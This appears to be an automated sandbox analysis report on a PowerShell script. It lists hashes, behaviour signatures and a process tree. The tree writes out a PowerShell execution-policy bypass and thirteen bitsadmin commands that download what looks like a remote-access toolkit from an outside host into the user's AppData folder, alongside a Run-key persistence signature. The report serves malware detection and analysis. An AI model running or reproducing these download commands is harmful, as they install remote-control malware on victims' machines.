Analysis

  • max time kernel
    122s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    24-01-2024 02:36

General

  • Target

    new 1.ps1

  • Size

    2KB

  • MD5

    164fa80eb15e670539783d577140c0e8

  • SHA1

    316d04c9a545bf48580a58750d8cfe0d7e3f6080

  • SHA256

    be819fd3ceef5b47fd3f1b3a84812db1cef8297e6eb3372e06134d3517e68297

  • SHA512

    73aa708d74e2b6862f61c1344ce6f18576400c5616332669f27e6fa8d255fc4ebee50e3b77dd408d6c772641907dee92dc979e505366b3d5ce952928bfadeb35

Score
6/10

Malware Config

Signatures

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Download via BitsAdmin 1 TTPs 13 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\new 1.ps1"
    1⤵
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2368
    • C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /trAnSFER lyq4XY5i /doWnLOaD /pRioritY NoRmAl https://core-click.net/TVFrontend/mock/HTCTL32.DLL C:\Users\Admin\AppData\Roaming\aragdrts\HTCTL32.DLL
      2⤵
      • Download via BitsAdmin
      PID:2836
    • C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /trAnSFER lyq4XY5i /doWnLOaD /pRioritY NoRmAl https://core-click.net/TVFrontend/mock/nsm_vpro.ini C:\Users\Admin\AppData\Roaming\aragdrts\nsm_vpro.ini
      2⤵
      • Download via BitsAdmin
      PID:2744
    • C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /trAnSFER lyq4XY5i /doWnLOaD /pRioritY NoRmAl https://core-click.net/TVFrontend/mock/client32.ini C:\Users\Admin\AppData\Roaming\aragdrts\client32.ini
      2⤵
      • Download via BitsAdmin
      PID:2584
    • C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /trAnSFER lyq4XY5i /doWnLOaD /pRioritY NoRmAl https://core-click.net/TVFrontend/mock/client32.exe C:\Users\Admin\AppData\Roaming\aragdrts\client32.exe
      2⤵
      • Download via BitsAdmin
      PID:2828
    • C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /trAnSFER lyq4XY5i /doWnLOaD /pRioritY NoRmAl https://core-click.net/TVFrontend/mock/pcicapi.dll C:\Users\Admin\AppData\Roaming\aragdrts\pcicapi.dll
      2⤵
      • Download via BitsAdmin
      PID:2604
    • C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /trAnSFER lyq4XY5i /doWnLOaD /pRioritY NoRmAl https://core-click.net/TVFrontend/mock/nskbfltr.inf C:\Users\Admin\AppData\Roaming\aragdrts\nskbfltr.inf
      2⤵
      • Download via BitsAdmin
      PID:2176
    • C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /trAnSFER lyq4XY5i /doWnLOaD /pRioritY NoRmAl https://core-click.net/TVFrontend/mock/NSM.LIC C:\Users\Admin\AppData\Roaming\aragdrts\NSM.LIC
      2⤵
      • Download via BitsAdmin
      PID:1612
    • C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /trAnSFER lyq4XY5i /doWnLOaD /pRioritY NoRmAl https://core-click.net/TVFrontend/mock/msvcr100.dll C:\Users\Admin\AppData\Roaming\aragdrts\msvcr100.dll
      2⤵
      • Download via BitsAdmin
      PID:2632
    • C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /trAnSFER lyq4XY5i /doWnLOaD /pRioritY NoRmAl https://core-click.net/TVFrontend/mock/remcmdstub.exe C:\Users\Admin\AppData\Roaming\aragdrts\remcmdstub.exe
      2⤵
      • Download via BitsAdmin
      PID:764
    • C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /trAnSFER lyq4XY5i /doWnLOaD /pRioritY NoRmAl https://core-click.net/TVFrontend/mock/PCICL32.DLL C:\Users\Admin\AppData\Roaming\aragdrts\PCICL32.DLL
      2⤵
      • Download via BitsAdmin
      PID:296
    • C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /trAnSFER lyq4XY5i /doWnLOaD /pRioritY NoRmAl https://core-click.net/TVFrontend/mock/TCCTL32.DLL C:\Users\Admin\AppData\Roaming\aragdrts\TCCTL32.DLL
      2⤵
      • Download via BitsAdmin
      PID:1968
    • C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /trAnSFER lyq4XY5i /doWnLOaD /pRioritY NoRmAl https://core-click.net/TVFrontend/mock/AudioCapture.dll C:\Users\Admin\AppData\Roaming\aragdrts\AudioCapture.dll
      2⤵
      • Download via BitsAdmin
      PID:1876
    • C:\Windows\system32\bitsadmin.exe
      "C:\Windows\system32\bitsadmin.exe" /trAnSFER lyq4XY5i /doWnLOaD /pRioritY NoRmAl https://core-click.net/TVFrontend/mock/PCICHEK.DLL C:\Users\Admin\AppData\Roaming\aragdrts\PCICHEK.DLL
      2⤵
      • Download via BitsAdmin
      PID:584

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2368-4-0x000000001B3B0000-0x000000001B692000-memory.dmp

    Filesize

    2.9MB

  • memory/2368-5-0x0000000001D70000-0x0000000001D78000-memory.dmp

    Filesize

    32KB

  • memory/2368-6-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

    Filesize

    9.6MB

  • memory/2368-7-0x0000000002960000-0x00000000029E0000-memory.dmp

    Filesize

    512KB

  • memory/2368-8-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

    Filesize

    9.6MB

  • memory/2368-9-0x0000000002960000-0x00000000029E0000-memory.dmp

    Filesize

    512KB

  • memory/2368-10-0x0000000002960000-0x00000000029E0000-memory.dmp

    Filesize

    512KB

  • memory/2368-11-0x0000000002960000-0x00000000029E0000-memory.dmp

    Filesize

    512KB

  • memory/2368-12-0x0000000002960000-0x00000000029E0000-memory.dmp

    Filesize

    512KB

  • memory/2368-13-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

    Filesize

    9.6MB

  • memory/2368-14-0x0000000002960000-0x00000000029E0000-memory.dmp

    Filesize

    512KB

  • memory/2368-15-0x0000000002960000-0x00000000029E0000-memory.dmp

    Filesize

    512KB

  • memory/2368-16-0x0000000002960000-0x00000000029E0000-memory.dmp

    Filesize

    512KB

  • memory/2368-18-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

    Filesize

    9.6MB